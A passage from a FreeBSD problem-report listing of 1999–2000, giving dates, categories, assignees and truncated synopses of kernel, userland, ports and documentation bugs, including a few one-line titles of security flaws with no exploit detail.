_PORT_USE touch cookies by variable, o [1999/08/04] bin/12957 rpc.rusersd dumps core with signal 11 whe f [1999/08/04] bin/12962 des basename(3) and dirname(3) part 2 o [1999/08/04] kern/12966 receiver lockups in vr0 driver o [1999/08/05] bin/12982 last does not support -y option. o [1999/08/05] misc/12983 system hang accessing mounted msdos flopp o [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/07] conf/13016 gshapiro Wrong sendmail.cf file used by mergemaste o [1999/08/07] docs/13020 mpp Manpage capitalization o [1999/08/08] misc/13036 de doesn't work with DEC 21143 based PCI o [1999/08/09] bin/13042 will make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/09] i386/13051 after installation on system using COM1, o [1999/08/10] kern/13062 lnc ethernet xmit underflow problem o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/11] docs/13079 dwhite new man page describing timeradd() family o [1999/08/11] kern/13082 dfr Improved support for NE2000 PnP cards o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna o [1999/08/15] kern/13161 alfred mounting on top of a mounted file system o [1999/08/15] kern/13164 jhb kthread_exit stops, but doesn't release p o [1999/08/16] misc/13185 "tengo problemas con el pop3" o [1999/08/18] docs/13218 mpp Many manpages still not conformed mdoc(7) o [1999/08/18] kern/13220 mkdep: compile failed - ../../pci/if_de.c o [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque s [1999/08/19] kern/13252 niced jobs don't behave really nice o [1999/08/19] bin/13254 yp_all error messages have wrong text o [1999/08/20] misc/13266 Removal of #defines and addition of const o [1999/08/20] bin/13278 rogue: killed by fire corrupts score file o [1999/08/21] bin/13309 Fixes to nos-tun o [1999/08/22] misc/13326 additional timeval interfaces for 512MB o [1999/09/22] ports/13898 obrien New port: misc/dictd o [1999/09/23] conf/13918 Termcap entries for VESA modes missing a [1999/09/23] gnu/13921 sheldonh awk -v var=val coredump o [1999/09/23] kern/13924 sb/snd driver broken under 4.0-19990918-C o [1999/09/24] i386/13936 murray No clear indictaion of how much space to o [1999/09/25] docs/13950 doc webpage idea o [1999/09/25] docs/13967 doc FreeBSD Related Publications in Korea o [1999/09/26] kern/13979 [PATCH] add serial number to IDE HD probe o [1999/09/27] kern/14006 pas2_pcm.c pcm playback problem, with fix o [1999/09/29] bin/14040 amd has wrong uname data compile in it o [1999/09/30] i386/14048 ``doscmd -r'' doesn't work o [1999/10/01] ports/14077 dec Multicast not available on multicast enab o [1999/10/01] bin/14078 -stable 'make release' does not work on - f [1999/10/01] kern/14083 gibbs CAM 3.3-RELEASE fails boot w/2940UW + non o [1999/10/05] bin/14142 gshapiro sendmail: mci.c: bad pointer conversion i o [1999/10/06] docs/14158 doc md5(1) manpage should not claim the md5 a o [1999/10/06] docs/14165 nbm FDP introduction article o [1999/10/06] kern/14166 roger AVER TVPhone o [1999/10/07] bin/14175 route for ip aliasing o [1999/10/07] ports/14182 asami Patch: bsd.port.mk: add plist target o [1999/10/08] kern/14217 bde [PATCH] EXT2FS as a KLD o [1999/10/09] ports/14225 markm Patches for security/pgp5 o [1999/10/09] kern/14240 compilation error: __cmpdi2 unresolved o [1999/10/09] bin/14246 kvm_open and kvm_openfiles not works corr o [1999/10/10] bin/14255 rup and rusers could not deal with many h o [1999/10/11] misc/14258 IP_TOS and IP_TTL sockopt doesn't work on a [1999/10/11] ports/14260 jkoshy new port: www/woda - A Web Oriented Datab o [1999/10/11] misc/14263 phantom There ara no ukrainian locale in stable/c o [1999/10/11] misc/14273 Somewhat bogus entry in termcap o [1999/10/13] ports/14316 markm exmh not recognizing mh and uses too many o [1999/10/13] bin/14318 jkh sysinstall upon install has some counter- o [1999/10/14] ports/14323 markm [PATCH] ports/security/pgp5: Invoked with o [1999/10/14] bin/14330 peter [PATCH] fix clash between /usr/src/contri o [1999/10/14] bin/14335 peter Manual page for ndc gives incorrect path o [1999/10/15] kern/14346 imp Both pccard/cardinfo.h and sys/memrange.h o [1999/10/15] kern/14350 Security enhancement to ICMP o [1999/10/15] kern/14355 perhaps a guard page needed for UP-mode k o [1999/10/15] kern/14356 grog vinum and ``some processes would not die; o [1999/10/16] bin/14361 locate bogusly converts to network byte o o [1999/10/17] kern/14380 [PATCH] if_de workaround for when BIOS do o [1999/10/18] i386/14396 Floppy install of 3.2-release, 3.3-releas o [1999/10/21] bin/14448 ftp-client may not recognize failure, rep o [1999/10/23] misc/14488 kget doesn´t write the key word "enable" o [1999/10/25] misc/14511 chapss Y2K problem o [1999/10/25] bin/14533 imp pccardd improperly assigns irqs o [1999/10/26] bin/14545 quota reports in K, but header says 'bloc a [1999/10/27] kern/14561 ken ioctl (fd, CDIOCEJECT, (void*) 0) doesn't s [1999/10/27] kern/14562 ken ioctl() codes should be provided for ejec o [1999/10/27] docs/14565 doc ioctl() codes for device type `fd' (flopp o [1999/10/27] i386/14574 ISA based ESS1688 support(partially) for o [1999/10/28] kern/14584 Proposition for improved file permissions o [1999/10/29] misc/14599 pam_kerberosIV.so in the 'krb.??' package o [1999/10/29] kern/14602 struct utsname fields are allocated too s o [1999/10/31] kern/14639 convert proc.p_peers to a queue(3) LIST o [1999/11/01] kern/14646 kern.boottime affected by APM suspend/res o [1999/11/01] bin/14648 markm `make world' now requires -DNOCRYPT in my o [1999/11/02] gnu/14664 tar checks for volno-file even if it shou o [1999/11/02] docs/14677 chris listing of (48) utilities in /bin:/sbin:/ a [1999/11/03] docs/14682 marko lprm(1) unaware of lp(1) Environment Vari o [1999/11/03] bin/14697 grog Exploitable buffer overflow in Vinum (Fre o [1999/11/04] conf/14714 phantom Need support for imap4 and pop3 in /etc/p o [1999/11/06] misc/14746 xf86config shell script leaves arrow keys o [1999/11/08] ports/14783 jmz mgetty 1.1.12 always sets clocal o [1999/11/08] bin/14786 dwmalone [PATCH] tail breaks on large files o [1999/11/08] conf/14791 Optionally change the behaviour of fsck u o [1999/11/08] i386/14793 more fdisk partition types o [1999/11/09] i386/14800 FreeBSD BootMgr not configurable (or at l o [1999/11/10] conf/14810 [PATCH] initialising multiple interfaces a [1999/11/10] bin/14817 strptime(3) '%C' conversion incorrect o [1999/11/11] ports/14824 wosch no '\0' at the end of buffer o [1999/11/11] bin/14829 rc.shutdown is handled unconsistently by o [1999/11/12] kern/14839 RELENG_2_2 boot kernel is large size prob o [1999/11/12] kern/14840 Opti930 doesn't work. o [1999/11/12] kern/14841 adrian IEEE 802 encapsulation for arp on etherne o [1999/11/12] ports/14854 peter port comms/conserver partially ignores ${ o [1999/11/13] conf/14864 I can not get dual Boot to boot FreeBSD f o [1999/11/14] i386/14891 New smbus driver lmsmb a [1999/11/16] ports/14924 markm p5-Apache-Radius with mod_perl broken on o [1999/11/16] bin/14925 getsubopt isn't poisonous enough o [1999/11/16] conf/14931 rc logging facility f [1999/11/16] ports/14933 imp Simple patch to log password attempts on o [1999/11/17] ports/14965 wosch stat port doesn't know fifo file type o [1999/11/17] kern/14968 wollman Convert resource_head and resource.r_link o [1999/11/17] ports/14970 peter conserver-7.4 port submission o [1999/11/18] conf/14973 Digi-multiport serial card? f [1999/11/18] conf/14974 jhb In RELENG_3, fdisk reports sizes incorrec o [1999/11/18] ports/14977 peter conserver doesn't support speed over than o [1999/11/19] misc/14993 Freebsd Locks up when trying to set the h o [1999/11/19] misc/14999 phantom ISO8859-5 locale missing from RELENG_3 o [1999/11/19] misc/15000 ftp(1) needs to send HTTP/1.1 Host: heade o [1999/11/20] conf/15010 "client" firewall configuration kills inc o [1999/11/21] ports/15021 asami some port installs fail for non-root user o [1999/11/21] kern/15022 jkh Suggestion for enhancement: move isp firm o [1999/11/21] conf/15038 jkh In sysinstall, easy to not notice that se o [1999/11/23] kern/15065 fsck can't fix "huge" zero length files o [1999/11/25] kern/15095 TCP's advertised window is not scaled imm o [1999/11/27] i386/15119 pcm sound driver dma problems with isa-pn o [1999/11/28] ports/15142 jmz Added DIST_SUBDIR to print/tex port o [1999/11/29] misc/15168 Adding tracklist support to fdformat o [1999/11/29] kern/15175 tcp_input() fails to update m->m_pkthdr.l o [1999/11/30] bin/15182 "* Wed-1 event" in calendar produces "31 o [1999/11/30] misc/15196 shutdown -h no longer synching disks, thu o [1999/12/01] misc/15205 billf Addition to /usr/games/random o [1999/12/01] misc/15215 Outputting in Fortune under certain circu o [1999/12/02] i386/15218 kernel says: raw partition size != slice o [1999/12/02] bin/15229 joe mtree - different from mtree in NetBSD 1. o [1999/12/05] kern/15280 kernel panic during FreeBSD install o [1999/12/06] bin/15301 Bug in /usr/sbin/syslogd: strips 8th bits o [1999/12/06] misc/15304 bmah proposed modifications to pkg_version o [1999/12/07] ports/15329 cwt amanda24 modification o [1999/12/07] misc/15339 fdformat should exit non-zero when user c o [1999/12/09] ports/15387 billf ethereal's packet-smb.c calls str*() func o [1999/12/09] bin/15390 obrien Upgrade rdist to 6.1.5 o [1999/12/10] bin/15410 edquota -p copies current usage as well a o [1999/12/11] bin/15416 addr2line is unable to find line numbers o [1999/12/11] bin/15418 tput(1) doesn't work with new libncurses. o [1999/12/11] misc/15421 initgroups(3) spits out messages to stder o [1999/12/12] kern/15435 Attempts to execute programs from a noexe o [1999/12/12] kern/15436 syscons extension: "propellers" o [1999/12/13] bin/15456 Usage of ktrace(1) is invalid a [1999/12/13] bin/15458 sort(1) doesn't sort correctly in some ca o [1999/12/13] bin/15470 Proposed change to comments in /etc/named o [1999/12/14] ports/15477 ports wwwstat-2.01 port is not Y2K compliant: 1 o [1999/12/14] misc/15480 Change-request for /usr/src/usr.sbin/cdco o [1999/12/14] kern/15489 running fstat causes a bus error o [1999/12/15] kern/15492 Patch to fixup bridging support for 2.2-S o [1999/12/15] kern/15493 Patch to enable bridging support for if_c o [1999/12/15] ports/15495 asami Add "addsum" target to bsd.port.mk o [1999/12/15] bin/15496 killall(1) limited to 16 character proces o [1999/12/15] bin/15497 NIS does not deal well with comments o [1999/12/15] bin/15510 df(1) does not lineup with large filesyst o [1999/12/15] kern/15511 Cannot scroll up after panic? o [1999/12/17] i386/15528 doscmd exec function fail. o [1999/12/17] i386/15531 doscmd DOS function 0a fail when DL is 0 o [1999/12/17] kern/15532 Reboot just to kill a print job? o [1999/12/17] misc/15546 Need to enable LBA flag for large IDE dis o [1999/12/17] i386/15547 discmd function 51 ( get ps ) fail o [1999/12/18] misc/15555 some enhancements for uudecode o [1999/12/20] bin/15593 [SECURITY] ustrcpy() buffer overflow in d s [1999/12/20] ports/15594 will kscd-1.2.7 in -STABLE ports not playing A o [1999/12/20] bin/15596 netstat -rn does'n fit on a 80 chars wide o [1999/12/21] kern/15608 acd0 / cd0 give inconsistent errors on em o [1999/12/21] conf/15612 jkh Re-Scan devices in 3.4-Release options me o [1999/12/21] i386/15619 standard pppd doesn't authenticate users o [1999/12/22] kern/15636 dillon reminder to self for MAP_ VM defines o [1999/12/23] misc/15658 edquota misinterprets usernames as uid ra o [1999/12/24] bin/15663 yokota none o [1999/12/28] bin/15739 repquota report format fix for better par o [1999/12/28] kern/15747 dcs loader's builtin "more" command won't res o [1999/12/28] conf/15748 jkh sysinstall - upgrade a [2000/01/01] docs/15821 asmodai Wrong device names in manpages for lpt(4) o [2000/01/01] kern/15827 Power-Off causes Trap 9 in kernel o [2000/01/01] bin/15830 imp PATCH: rdump over ssh o [2000/01/02] kern/15838 Conversion tables in msdosfs_conv.c are b o [2000/01/02] bin/15852 asmodai predefined \*(DT string has Y2K bug o [2000/01/02] bin/15853 tar --newer-mtime flag has Y2K bug o [2000/01/03] bin/15855 comsat(8) failes to open system mail box o [2000/01/03] kern/15860 patch to make default kern.maxfilesperpro o [2000/01/03] bin/15861 dan ftpd did not use sendfile(2) when sending o [2000/01/03] misc/15871 small CVS directories copied to PicoBSD filesys o [2000/01/03] misc/15874 small PicoBSD can only update files from within o [2000/01/03] misc/15875 small Incorrect permissions on PicoBSD /tmp dir o [2000/01/03] misc/15876 small PicoBSD message of the day problems o [2000/01/05] misc/15908 patch to fix argument mismatch in getnano s [2000/01/06] docs/15959 phantom misplaced lines in psignal.9 man page o [2000/01/08] kern/15983 n_hibma C++ keywords in kernel header files o [2000/01/08] ports/15992 joe [PATCH] Add a default for $SUP in the /us o [2000/01/08] ports/15993 asami [PATCH]No line-feed in warnings from ``ma o [2000/01/09] misc/16003 sysinstall crashes if it gets more than o o [2000/01/09] bin/16005 brian add new option to date(1) o [2000/01/09] bin/16007 joe cdcontrol(1) defaulting do /dev/cdrom ins o [2000/01/09] misc/16009 Invoking /stand/sysinstall from kde termi o [2000/01/09] kern/16016 cam/scsi/scsi_da.c: Fujitsu M2952 doesn't o [2000/01/10] kern/16021 To support SMP on NEC PC98, call mp_probe o [2000/01/10] kern/16023 Add an idletime counter for sppp, just li s [2000/01/10] bin/16048 asmodai "file" command cannot recognize LaTeX2e f o [2000/01/10] kern/16049 Connor Drive fails cache sync o [2000/01/11] ports/16072 obrien vim5 port update o [2000/01/11] conf/16076 markm [PATCH] pam_ssh examples for /etc/pam.con o [2000/01/14] bin/16119 ctm_rmail does not honor umask o [2000/01/14] bin/16124 imp [PATCH] Enhancement for 'lpr -r' o [2000/01/15] ports/16139 billf Ntop port fails to find lsof o [2000/01/18] kern/16169 The U.S. Robotics 56K Voice Int modem is o [2000/01/18] misc/16189 Advansys ASB-3940U2W SCSI Card does not w o [2000/01/18] kern/16195 16-bit uid/gid struct in sys/ipc.h o [2000/01/19] bin/16206 PATCH: vmstat column alignment, %ll not s o [2000/01/19] misc/16208 ps/2 mouse problem o [2000/01/19] misc/16212 in /stand/sysinstall -- cannot exit menu o [2000/01/20] ports/16220 obrien -frepo is broken in gcc-devel and egcs po o [2000/01/21] ports/16252 asami bsd.port.mk: Add bzip2 support for distri o [2000/01/21] bin/16275 steve approve send-pr(1) (attach files, use env o [2000/01/22] kern/16292 performance problem of divert socket o [2000/01/23] bin/16316 Enhancement: allow .fakeid to be a named o [2000/01/23] bin/16320 fstat -f confuses some partitions o [2000/01/24] kern/16339 vm/vm_page.h PQ_L2_SIZE options too limit o [2000/01/25] ports/16347 sobomax Inconsistencies between Java ports o [2000/01/25] kern/16360 kernel timestamping of ICMP echo requests o [2000/01/26] bin/16364 [PATCH] Add msdosfs and cd9660 support to f [2000/01/26] ports/16374 ache Ports fix: news/tin o [2000/01/27] i386/16411 DUMP freezes system if uucico or samba wr o [2000/01/28] bin/16422 newfs always make root's / directory f [2000/01/28] misc/16434 Odd rlogin problem. o [2000/01/30] bin/16480 locked accounts and adduser o [2000/02/06] conf/16536 size of /var/spool/uucp/Log, a UUCP logfi o [2000/02/06] kern/16551 cosmetic cleanup in sys/dev/ppbus/pcfcloc o [2000/02/07] ports/16570 asami ports toplevel README.html has bad link t o [2000/02/08] conf/16584 jkh Hostname field too small during install ( o [2000/02/09] bin/16619 trimdomain does not handle peer domains o [2000/02/09] bin/16625 Incorrect information in routed(8) error o [2000/02/10] ports/16640 jfitz rwhois port install tries to copy wrong l o [2000/02/10] bin/16649 /bin/lastcomm: output contains extraneous f [2000/02/11] ports/16654 mharo Some master sites have discontinued hosti o [2000/02/11] bin/16657 /bin/hostname: New feature to return subc o [2000/02/13] bin/16705 ftpd doesn't support -h option o [2000/02/14] kern/16709 PATCH: make poll work for -STABLE's Audio o [2000/02/14] kern/16713 grog Vinum: some processes would not die; ps a o [2000/02/14] misc/16719 /stand/sysinstall does not redraw the scr o [2000/02/14] i386/16722 squid (a 3.x binary) won't run under 4.0- o [2000/02/15] bin/16726 rpc.rstatd from inetd sig11's o [2000/02/16] kern/16745 Kernel Makefile doesn't sanitise PATH [PA o [2000/02/16] kern/16765 Add support for mark/space parity o [2000/02/18] kern/16815 dillon Cannot "rm -rf" for not-existed file on r o [2000/02/19] misc/16830 markm PAM-related error messages on -current o [2000/02/20] misc/16839 dan MFC Matthew D. Fuller's patch to deal wit o [2000/02/20] misc/16840 dan MFC: Matthew D. Fuller's teach pkg_info t o [2000/02/20] docs/16843 doc Knob for release/Makefile to prevent dele o [2000/02/21] ports/16872 max Update port: japanese/pine o [2000/02/21] bin/16880 davidn [PATCH] pw(8) hardcodes directory creatio o [2000/02/22] bin/16924 tmpfile(3) ignores TMPDIR and always uses o [2000/02/22] bin/16926 kris [PATCH] banner doesn't allocate space fo o [2000/02/22] kern/16928 dynamic sysctl enhancement o [2000/02/22] bin/16929 [PATCH] prevent possible race condition i o [2000/02/23] misc/16938 FTP does not fully parse ftp:// URLs o [2000/02/24] misc/16969 yokota /kernel: psmintr: out of sync (0000 != 00 o [2000/02/24] bin/16971 Exiting from /usr/sbin/login does not res o [2000/02/25] ports/16987 obrien pkg_delete vim-5.X incorrect o [2000/02/26] kern/17003 dscheck() overzealously protects labels o o [2000/02/26] kern/17007 This is a code for implementing ethernet o [2000/02/27] conf/17022 rwatson newsyslog.conf not in sync with syslog.co o [2000/02/27] alpha/17032 alpha strtod(3) floating exception o [2000/02/28] misc/17045 Cannot install on Siemens Primergy 870 (d o [2000/02/28] kern/17058 mjacob SCSI tape driver can't drive devs that ca o [2000/02/29] bin/17077 yokota write() error o [2000/03/01] docs/17104 phantom gethostbyname(3) contains a reference to o [2000/03/01] kern/17109 darrenr fastroute crashes for lo0 udp o [2000/03/02] ports/17127 obrien Ports fix: editors/vim5 o [2000/03/02] misc/17132 bugs in xdr functions o [2000/03/02] ports/17139 billf PLIST correction for Apache13-fp o [2000/03/04] misc/17178 -d option of lpd didnt work o [2000/03/04] misc/17185 main ncurses headerfile is installed as c f [2000/03/04] i386/17198 3.4 doesn't boot from CD on dell 3500 o [2000/03/04] gnu/17202 uucp grade patch and policy o [2000/03/05] conf/17207 disktab support for Fuji-MO o [2000/03/05] gnu/17214 obrien gdb doesn't honor auto-solib-add o [2000/03/06] kern/17222 Avance Logic ALS/100 sound card doesn't r o [2000/03/06] kern/17224 4.0-20000214-CURRENT: pcm/csa sound - sha o [2000/03/06] bin/17226 markm ftpd can't use PAM o [2000/03/06] misc/17232 obrien chown(1) and chgrp(1) do not honor -v fla a [2000/03/06] ports/17241 mharo Update: japanese/tkdesk o [2000/03/07] ports/17255 pst Update the GNATS port to 3.113 o [2000/03/07] ports/17259 reg Update port www/mozilla o [2000/03/08] misc/17270 FreeBSD should support nsswitch.conf, or o [2000/03/08] misc/17272 deleting a file that a program has open c o [2000/03/08] misc/17275 asami make release fails when making readmes fo f [2000/03/08] ports/17279 obrien USA/Canada Netscape Navigator 4.72 FreeBS o [2000/03/09] bin/17289 [PATCH] wrong permissions on /var/run/pri o [2000/03/09] ports/17293 hosokawa samba port installs man-pages twice, fail o [2000/03/09] kern/17297 Panic when mounting a CDRom f [2000/03/10] ports/17309 ports ports/audio/cdd doesn't support .wav outp o [2000/03/13] kern/17358 PCI ids for Aureal 8810, 8820 and 8830 au o [2000/03/13] bin/17363 crontab(1) leaves files in /var/cron/tabs o [2000/03/13] bin/17368 billf Bad error messaging from mountd(8) o [2000/03/14] misc/17377 "Checking for rejected mail hosts:" gives o [2000/03/14] kern/17385 Support for IIT's "XC87SLC-33" numeric pr o [2000/03/15] bin/17389 /bin/cp failed on some synthetic vfs o [2000/03/15] bin/17395 This is a replacement for the perl versio o [2000/03/15] misc/17399 FTPing into machine slows it down o [2000/03/16] bin/17405 one more fstat patch o [2000/03/16] alpha/17411 alpha No link/activity lights Alpha ethernet ca f [2000/03/16] ports/17414 mharo upgrade and fix for the postilion port o [2000/03/16] kern/17425 nsouch [PATCH] fix two small printing errors in o [2000/03/16] ports/17427 cwt a big enhancement to the flexability of t o [2000/03/17] bin/17430 jkh Missing Czech keyboard in /stand/sysinsta o [2000/03/17] kern/17438 cg newpcm volume too low on Soundblaster Pro o [2000/03/17] kern/17441 4.0-STABLE: Intel 82801AA SMBus Controlle o [2000/03/18] ports/17465 jmacd Update port: lang/STk to 4.0.1 o [2000/03/18] docs/17470 jasone Missing man page: pthread_yield o [2000/03/18] ports/17471 rse presence of devel/pth-devel port breaks w o [2000/03/18] ports/17479 asami bsd.port.mk: PARALLEL_BUILD o [2000/03/18] bin/17480 m4 changecom doesn't work as documented o [2000/03/19] kern/17487 sos ide/atapi/cdrom bugs o [2000/03/19] ports/17489 ports Zephyr port is broken with Kerberos enabl o [2000/03/19] ports/17490 markm ports fail for some gnu programs as the g o [2000/03/19] kern/17493 Updates to use FreeBSD as a firewall and o [2000/03/19] bin/17498 killall(1) is a slow perl script that's d o [2000/03/20] i386/17505 Problems with with SMP on Compaq proliant f [2000/03/20] docs/17521 doc Proposed FAQ on assembly programming o [2000/03/21] bin/17532 "host" only prints A records by default o [2000/03/21] kern/17539 kernel panic when asking help in visual u o [2000/03/22] bin/17546 murray Sysinstall does not let you configure NIS f [2000/03/22] bin/17555 green fstat(1) doesn't show memory-mapped files o [2000/03/24] kern/17581 devices failing probing do so silently o [2000/03/24] ports/17585 obrien Outputs small message for user of lang/gc o [2000/03/24] kern/17589 sos ata crashes when trying to extract cd-da o [2000/03/25] docs/17598 doc installworld over NFS documentation no lo o [2000/03/25] ports/17602 jmz Port fix x11/XFree86-4.0 (make deinstall o [2000/03/26] bin/17611 f77 man page needs updated o [2000/03/27] bin/17619 pax cannot read all tar files created by o [2000/03/27] bin/17623 date(1) -v doesn't handle time changes (D o [2000/03/27] i386/17628 mdodd 3c509b hangs on running ifconfig o [2000/03/28] bin/17640 lseek();read() -> pread() in dump and fsc o [2000/03/29] bin/17679 wpaul wicontrol should take multiple args on co o [2000/03/30] kern/17688 es_callback() in /sys/pci/es1370.c does n o [2000/03/30] bin/17694 wcstombs(), mbstowcs() not complying with o [2000/03/30] conf/17699 Support for dutch keyboards in the consol o [2000/03/31] bin/17720 presence of old /dev entries causes sysin o [2000/04/01] kern/17728 probe Macronix 98715/98715A 10/100BaseTX f [2000/04/01] misc/17737 dwhite Major repair of PicoBSD o [2000/04/01] bin/17739 Traceroute will not compile without IPSEC o [2000/04/02] kern/17751 wpaul rl driver loaded as module when it alread o [2000/04/02] bin/17756 kris sshd ignores .hushlogin f [2000/04/02] kern/17758 green Make sl driver dynamicallly expandable. o [2000/04/03] bin/17772 TFTP can not handle big files (> 32MBytes o [2000/04/03] kern/17774 doc stray irq7 o [2000/04/03] kern/17775 4.0-STABLE: Adaptec-155-ATM at en0 causi o [2000/04/03] ports/17777 torstenb [PATCH] Postfix port to consistently use o [2000/04/04] kern/17796 cg pcm drivers failes to load for Neomagic o o [2000/04/04] ports/17799 alex new port: lang/jgnat o [2000/04/04] ports/17801 jake new port: devel/binutils11 o [2000/04/04] ports/17802 jake port update: devel/gcc11 o [2000/04/04] ports/17803 jake new port: devel/gdb11 o [2000/04/05] gnu/17812 gprof gives error: o [2000/04/05] kern/17819 adrian Build ports on nfs & union mount panics k o [2000/04/06] ports/17822 obrien www/netscape47-navigator.us port missing f [2000/04/06] bin/17824 sheldonh [PATCH] /usr/bin/column has arithmetic ov o [2000/04/06] bin/17830 /usr/bin/login called from command line d o [2000/04/07] misc/17848 Patches to remove support for CSRG libm f [2000/04/07] docs/17855 alex PPP Primer is out-of-date o [2000/04/07] misc/17857 During a sysinstall kernel sources say th o [2000/04/08] bin/17864 PATCH: sys/resource.h needs sys/time.h fo o [2000/04/09] misc/17889 certain type of DNS queries seem to get d o [2000/04/10] ports/17897 chuckr transfig does not compile with XFree86-4. o [2000/04/10] ports/17903 billf Allow CVS_UPDATE to be used with SUP_UPDA o [2000/04/10] i386/17906 le ethernet device doesn't work in 4.0 o [2000/04/10] kern/17907 cg Audio record levels are too low o [2000/04/10] docs/17916 alex [PATCH] rewrite of cutting-edge section o o [2000/04/10] ports/17921 green licq in the ports collection is missing a a [2000/04/11] bin/17939 sheldonh routed calls ntohs twice on the same fiel o [2000/04/12] ports/17952 torstenb [PATCH] tcp_wrappers port to give better o [2000/04/12] misc/17957 installer navigation is confusing o [2000/04/13] misc/17983 Minikernel build instructions do not work o [2000/04/13] conf/17993 improving on the default /etc/amd.map o [2000/04/13] bin/17997 nvi doesn't set variables on startup (via o [2000/04/14] kern/18001 PCM - Yamaha OPL-SAx doesn't have treble/ o [2000/04/14] misc/18014 Machine doesn't boot without keyboard att o [2000/04/17] ports/18057 jmz make install for XFree86-4 fails on alpha o [2000/04/17] gnu/18061 obrien /usr/bin/ld (GNU ld 2.9.1) ignores rpath o [2000/04/18] ports/18073 obrien wget fails to build correctly o [2000/04/18] bin/18080 davidn [PATCH] pw documentation updated to refle o [2000/04/18] ports/18083 rse Gratuitous Apache package inconsistencies o [2000/04/19] ports/18093 obrien lang/gcc-devel install error o [2000/04/19] misc/18097 What is this: LIBRATION not specified - u o [2000/04/19] bin/18100 update to src/usr.bin/from/from.c for mul o [2000/04/20] misc/18109 if pw_shell is empty(/bin/sh is assumed), s [2000/04/20] bin/18114 ken msps from iostat is wrong o [2000/04/21] misc/18131 MAX_IFS in pppd/sys-bsd.c too small for m a [2000/04/22] conf/18152 /etc/exports should suggest how to get mo o [2000/04/22] i386/18154 [PATCH] Add cpu class and features flags a [2000/04/22] kern/18155 sos [Patch] OPTi FireStar(82C700) o [2000/04/22] bin/18157 pnpinfo only prints first io-start for ev o [2000/04/22] conf/18164 roberto /var/log/ntpstats fill with stat files by o [2000/04/23] misc/18175 strtok(3) example doesn't work. o [2000/04/23] ports/18184 ache GNU Patch 2.5.4 Port o [2000/04/24] bin/18191 pac core dumped without set /etc/printcap o [2000/04/24] bin/18193 Bogus diagnostics by nslookup(1) o [2000/04/26] kern/18232 SMP + APM configerd 4.0 kernel did panic o [2000/04/26] docs/18243 alex wrong description of -p option in sh(1) m o [2000/04/27] misc/18255 makewhatis weekly job doesn't look at /us o [2000/04/27] ports/18256 sada www/netscape4* lacks Fortify on alpha o [2000/04/27] ports/18259 obrien ElectricFence installation breaks if the o [2000/04/28] kern/18271 simplelock: klds not portable across UP a o [2000/04/28] bin/18275 proposed TMPDIR setting and /usr/bin/mkin o [2000/04/28] kern/18289 CPU Time exceeded delivered multiple time o [2000/04/29] ports/18291 asami make makesum fetches new sources, make fe o [2000/04/29] kern/18293 lack of versapad mouse wheel emulation o [2000/04/29] kern/18295 Audio is gone after hibernation o [2000/04/30] ports/18310 obrien ports/devel/cdk install error o [2000/04/30] bin/18319 "dump" fails with "cannot reopen disk: in o [2000/05/01] bin/18326 dwmalone no /usr/libdata/lint/llib-lc.ln o [2000/05/01] bin/18329 ben futimes() and lutimes() missing from ' cannot be used in "via" o [2000/05/29] ports/18896 jseger Tcl "info hostname" command returns chop- o [2000/05/30] kern/18909 dwmalone select(2) timeout limited to 100000000 se a [2000/05/30] ports/18911 sada New port - plptools o [2000/05/31] kern/18928 options ROOTDENAME=xxx on kernel config f f [2000/06/01] misc/18934 X11 forwarding not requested with DISPLAY o [2000/06/01] bin/18946 jhb Add support for enabling USB daemon from o [2000/06/01] ports/18960 asami Add USE_APACHE to bsd.port.mk for Apache o [2000/06/01] bin/18961 kris sshd does not print before motd o [2000/06/02] bin/18967 ypserv not linked with tcp wrappers o [2000/06/02] misc/18969 sound card not recognized by probe o [2000/06/02] ports/18977 obrien rsync report end job o [2000/06/03] misc/18987 Problems with Comtrol RocketPort o [2000/06/03] bin/18992 log packets blocked by filter rules o [2000/06/03] kern/18994 imp PCMCIA sio will happily attach to a used o [2000/06/03] misc/18995 assar Kerberos5 INCLUDES needed for make world o [2000/06/03] misc/18997 markm Kerberos5 CFLAGS needed o [2000/06/04] conf/19001 Delayed fsck + mount of insignificant fil o [2000/06/05] docs/19010 doc Bad144 obsoletion by 4.0 is undocumented; o [2000/06/05] i386/19012 No volume run out for /var and lead my Fr o [2000/06/05] misc/19037 Keyboard not detected on new install o [2000/06/05] misc/19038 The qpopper port accepts empty X-UIDL: he o [2000/06/05] bin/19044 billf Some games compare initscr() to ERR. o [2000/06/06] bin/19056 yacc in 3.4 and 4.0 reports "maximum tabl o [2000/06/06] bin/19057 offer of patch to uname that produces pre f [2000/06/06] ports/19061 kuriyama ports/textproc/lotusxsl the source zip pa f [2000/06/06] kern/19063 rnordier VGA keyboard sometimes fails to work in b o [2000/06/06] ports/19064 obrien Xosview broken on AXP Alpha o [2000/06/06] i386/19070 rnordier boot0 displays NTFS partitions as "??" o [2000/06/06] bin/19071 fmt not folding very long lines a [2000/06/06] ports/19082 ports Can't build editors/aXe-6.1.2 a [2000/06/07] misc/19087 deischen selects always restart when using threads o [2000/06/07] misc/19088 STL from SGI for FreeBSD 3.4 o [2000/06/07] ports/19112 asami files with names something,v in patches d o [2000/06/08] bin/19118 vmstat¤Ç avm¤Èfre¤ÎÃͤ¬Àܤ¹¤ë¡£ o [2000/06/08] ports/19119 jmz un-forbid x11/XFree86-4 and unbreak its x o [2000/06/08] misc/19124 ps(1) to support SysV-style options? o [2000/06/08] kern/19127 kernel panic on mount on burncd'd device o [2000/06/08] misc/19129 AMI Raid Express 200 card extremely slow o [2000/06/08] kern/19132 ATM HARP support apparently does not supp o [2000/06/09] kern/19156 jkh Enable the doFS.sh to run in arbitrary lo o [2000/06/09] kern/19158 U.S.Robotics 56K FAX INT not recognize co f [2000/06/10] conf/19178 ume add reject routes and comments in /etc/rc o [2000/06/10] bin/19183 more(1) doesn't handle redraw correctly o [2000/06/10] ports/19185 torstenb mail/postfix: manual pages contains !!PRE o [2000/06/10] ports/19193 jfieber Update textproc/jade to C{XX,}FLAGS safe o [2000/06/11] ports/19212 ports New port py-amk-crypto-0.13 o [2000/06/11] kern/19213 SC_DFLT_FONT compile option breaks kernel o [2000/06/12] ports/19224 andreas Problem installing p5-Net-SSLeay port o [2000/06/12] ports/19227 ports Installation problem: apache13-ssl port f [2000/06/13] conf/19236 